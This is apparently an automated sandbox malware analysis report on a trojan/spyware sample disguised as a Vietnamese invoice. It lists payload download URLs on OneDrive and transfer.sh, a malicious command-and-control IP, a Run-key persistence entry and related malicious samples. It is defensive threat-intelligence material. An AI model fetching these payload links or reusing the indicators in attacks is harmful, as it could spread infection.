                                                                                    https://www.google.com/chrome/static/images/fallback/icon-file-download.jpgbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                      high
                                                                                      http://www.imvu.com/aspnet_compiler.exe, 00000010.00000002.374830340.00000000009EA000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001B.00000002.392736661.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000020.00000002.416712597.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000024.00000002.432581722.0000000000EFA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeebhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drfalse
                                                                                          high
                                                                                          http://www.imvu.comaspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.google.com/chrome/static/images/download-browser/pixel_phone.pngbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                              high
                                                                                              http://pki.goog/gsr2/GTS1O1.crt0bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1bhv8995.tmp.39.drfalse
                                                                                                high
                                                                                                https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                  high
                                                                                                  https://kpf0yw.am.files.1drv.com45kTY#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.355126935.000000000253C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://onedrive.live.com/download?cid=B044AF3D48F7B886&resid=B044AF3D48F7B886Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.537970433.000000000250C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.537475545.00000000024E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.google.com/chrome/static/images/app-store-download.pngbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                      high
                                                                                                      https://kpf0yw.am.files.1drv.com/y4mDTH7qGldoE19yex0JjOdCD7abQr3OT41x7HoVD-gSuwIqkSH1AKWWpBjmzkRc7T3Shhejayly.exe, 00000012.00000002.539080976.000000000254C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://transfer.sh/get/3GTNpY/Rtbdyyicls.bmp%Pvdrkkndtbbqxgmhnqdwn.exe, 00000011.00000000.374284805.0000000000AE2000.00000002.00000001.01000000.00000009.sdmp, dwn.exe.12.dr, Cuhcxlcg[1].exe.12.drfalse
                                                                                                          high
                                                                                                          https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.pngbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drfalse
                                                                                                            high
                                                                                                            https://contextual.media.net/bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                              high
                                                                                                              https://pki.goog/repository/0bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drfalse
                                                                                                                high
                                                                                                                http://www.carterandcone.comlY#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://www.msn.com/bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                  high
                                                                                                                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drfalse
                                                                                                                    high
                                                                                                                    http://www.fontbureau.com/designers/frere-jones.htmlY#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674bhv8995.tmp.39.drfalse
                                                                                                                        high
                                                                                                                        https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpgbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                          high
                                                                                                                          https://www.google.com/chrome/static/images/fallback/icon-twitter.jpgbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                            high
                                                                                                                            https://www.newtonsoft.com/jsonschemaShhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804bhv8995.tmp.39.drfalse
                                                                                                                                high
                                                                                                                                https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3bhv8995.tmp.39.drfalse
                                                                                                                                  high
                                                                                                                                  https://contextual.media.net/48/nrrV18753.jsbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.google.com/chrome/static/images/fallback/icon-help.jpgbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.google.com/accounts/serviceloginaspnet_compiler.exefalse
                                                                                                                                        high
                                                                                                                                        https://www.google.com/chrome/static/images/homepage/google-enterprise.pngbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.google.com/chrome/static/images/homepage/google-dev.pngbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.google.com/chrome/static/images/thank-you/thankyou-animation.jsonbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                              high
                                                                                                                                              http://crl.pki.goog/gsr2/gsr2.crl0?bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://pki.goog/gsr2/GTSGIAG3.crt0)bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://www.google.com/bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                                high
                                                                                                                                                https://www.google.com/chrome/static/images/fallback/icon-fb.jpgbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.google.com/chrome/static/images/mac-ico.pngbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.fontbureau.com/designersGY#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://pki.goog/gsr2/GTS1O1.crt0#bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.fontbureau.com/designers/?Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.founder.com.cn/cn/bTheY#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://www.nirsoft.net-ms-win-core-delayload-l1-1-0.dll.dlldllaspnet_compiler.exe, 0000001D.00000002.452238930.0000000000AF4000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://www.fontbureau.com/designers?Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://aefd.nelreports.net/api/report?cat=bingthbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://onedrive.live.com/download?cid=B044AF3D48F7B886&resid=B044AF3D48F7B886%21122&authkey=AKVhH87Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exefalse
                                                                                                                                                            high
                                                                                                                                                            http://www.nirsoft.net-ms-win-core-delayload-l1-1-0.dll.dlldllDaspnet_compiler.exe, 00000013.00000002.420022464.0000000000AF4000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://www.google.com/chrome/static/images/google-play-download.pngbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.google.com/chrome/static/images/chrome_throbber_fast.gifbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.google.com/chrome/static/images/homepage/google-canary.pngbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngbhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://www.tiro.comY#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://www.newtonsoft.com/jsonY#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.goodfont.co.krY#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.imvu.com/Baspnet_compiler.exe, 00000029.00000002.453919934.000000000135A000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.google.com/chrome/static/images/homepage/laptop_desktop.pngbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.google.com/chrome/static/js/main.v2.min.jsbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                13.107.43.12
                                                                                                                                                                                l-0003.l-dc-msedge.netUnited States
                                                                                                                                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                194.5.98.244
                                                                                                                                                                                obologs.work.gdNetherlands
                                                                                                                                                                                208476DANILENKODEtrue
                                                                                                                                                                                144.76.136.153
                                                                                                                                                                                transfer.shGermany
                                                                                                                                                                                24940HETZNER-ASDEfalse
                                                                                                                                                                                178.237.33.50
                                                                                                                                                                                geoplugin.netNetherlands
                                                                                                                                                                                8455ATOM86-ASATOM86NLfalse
                                                                                                                                                                                IP
                                                                                                                                                                                192.168.2.1
                                                                                                                                                                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                                                Analysis ID:778240
                                                                                                                                                                                Start date and time:2023-01-05 09:21:10 +01:00
                                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                                Overall analysis duration:0h 13m 25s
                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                Report type:full
                                                                                                                                                                                Sample file name:Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                Number of analysed new started processes analysed:43
                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                Technologies:
                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                • HDC enabled
                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                Classification:mal100.phis.troj.spyw.evad.winEXE@65/22@19/5
                                                                                                                                                                                EGA Information:
                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                HDC Information:
                                                                                                                                                                                • Successful, ratio: 100% (good quality ratio 89%)
                                                                                                                                                                                • Quality average: 75.3%
                                                                                                                                                                                • Quality standard deviation: 33.6%
                                                                                                                                                                                HCA Information:
                                                                                                                                                                                • Successful, ratio: 97%
                                                                                                                                                                                • Number of executed functions: 233
                                                                                                                                                                                • Number of non-executed functions: 187
                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12
                                                                                                                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, fs.microsoft.com, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, odc-am-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, am-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-am-files-brs.onedrive.akadns.net
                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                09:22:30API Interceptor44x Sleep call for process: powershell.exe modified
                                                                                                                                                                                09:22:53API Interceptor1x Sleep call for process: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe modified
                                                                                                                                                                                09:22:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Shhejayly "C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe"
                                                                                                                                                                                09:23:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Shhejayly "C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe"
                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                13.107.43.12INV20230104-BR.exeGet hashmaliciousBrowse
                                                                                                                                                                                  shipping_documents.pdf.vbsGet hashmaliciousBrowse
                                                                                                                                                                                    inquiry.docGet hashmaliciousBrowse
                                                                                                                                                                                      Purchase Order_2241838_20221210_201349-pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                        00002827267381615.exeGet hashmaliciousBrowse
                                                                                                                                                                                          Purchase Order_2241838_20221210_201349-pdf.com.exeGet hashmaliciousBrowse
                                                                                                                                                                                            Purchase Inquiry_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                              REQUIRED ORDER.exeGet hashmaliciousBrowse
                                                                                                                                                                                                SecuriteInfo.com.Win32.InjectorX-gen.5219.3582.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  SecuriteInfo.com.Win32.Malware-gen.15285.91.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    1697-1698-1699pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      doc_234534_1252022pdf.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                        grano_PI.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                          SOA_INV.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                            SecuriteInfo.com.Win32.Malware-gen.15561.32631.exeGet hashmaliciousBrowse
                                                                                                                                                                                                              0321423605241625.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  000211232334_33455INVOICE .vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                    IMG_2022112022-6468.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                      SecuriteInfo.com.Win32.Malware-gen.5701.3804.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                        194.5.98.244INV20230104-BR.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                          solicitud de presupuesto 29-11-2022.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            RFQ Ref. # IRQ2107778.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              SecuriteInfo.com.Win32.CrypterX-gen.2000.5496.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                SecuriteInfo.com.W32.MSIL_Kryptik.GYT.gen.Eldorado.8264.27203.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                  SecuriteInfo.com.Win32.PWSX-gen.2830.17094.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                    SecuriteInfo.com.Win32.BackdoorX-gen.12634.2971.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                      SecuriteInfo.com.W32.MSIL_Kryptik.GYT.gen.Eldorado.23568.23625.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        SecuriteInfo.com.IL.Trojan.MSILZilla.23489.21173.10754.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                          SecuriteInfo.com.Win32.DropperX-gen.14761.32561.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                            SecuriteInfo.com.Win32.RansomX-gen.639.15211.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                              Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                shipping document pl&bl draft 17-10.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                  SecuriteInfo.com.Other.Malware-gen.13560.2061.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                    Richiesta di citazione fattura 13-10-2022.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.24386.31036.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                        SecuriteInfo.com.Win32.RATX-gen.28580.29163.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          RFQ ENGENTECH 11-10-2022113015.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                            SecuriteInfo.com.Win32.DropperX-gen.15579.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              Solicitud de cotizaci#U00f3n factura 28-09-2022.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                                                                l-0003.l-dc-msedge.netINV20230104-BR.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                9hXTu5MMZL.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                shipping_documents.pdf.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                inquiry.docGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                SecuriteInfo.com.Variant.Barys.26945.22988.31215.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                Purchase Order_2241838_20221210_201349-pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                00002827267381615.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                Purchase Order_2241838_20221210_201349-pdf.com.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                Purchase Inquiry_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                REQUIRED ORDER.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                SecuriteInfo.com.Win32.InjectorX-gen.5219.3582.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                SecuriteInfo.com.Win32.Malware-gen.15285.91.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                1697-1698-1699pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                doc_234534_1252022pdf.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                grano_PI.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                SOA_INV.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                SecuriteInfo.com.Win32.Malware-gen.15561.32631.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                Order #RR00-927361823.imgGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                0321423605241625.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUSEj3vSx3p8Y.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.237.60
                                                                                                                                                                                                                                                                Client.jpg.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 20.219.15.124
                                                                                                                                                                                                                                                                https://app.uizard.io/p/78d796e3Get hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.42.14
                                                                                                                                                                                                                                                                http://clickserve.dartsearch.net/link/click?&ds_a_cid=680760384&ds_a_caid=12694754542&ds_a_agid=123477218634&ds_a_fiid=&ds_a_lid=&&ds_e_adid=512650395034&ds_e_matchtype=&ds_e_device=c&ds_e_network=&&ds_url_v=2&ds_dest_url=https://mf606g.codesandbox.io/?dg=YWNjb3VudHNwYXlhYmxlQHBsYXRlYXV0ZWwuY29tGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 20.190.159.0
                                                                                                                                                                                                                                                                https://www.bing.com/ck/a?!&&p=c9c2566e4ab710b4JmltdHM9MTY3Mjc5MDQwMCZpZ3VpZD0xZGI0MmQwZi0yMjEwLTZhMjQtMzZhNC0zZjgwMjNlZDZiOGMmaW5zaWQ9NTE2NA&ptn=3&hsh=3&fclid=1db42d0f-2210-6a24-36a4-3f8023ed6b8c&u=a1aHR0cHM6Ly9jcmVhdGl2ZW1lZGlhc29sdXRpb25zLm9yZy8&ntb=1?qw=m.temnyk@gms-worldwide.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 204.79.197.200
                                                                                                                                                                                                                                                                Delivery Report.oneGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 52.109.76.141
                                                                                                                                                                                                                                                                Remittance01042023000128912838383.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.238.45
                                                                                                                                                                                                                                                                transmountain cyril_jenkins alex.correa.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.237.60
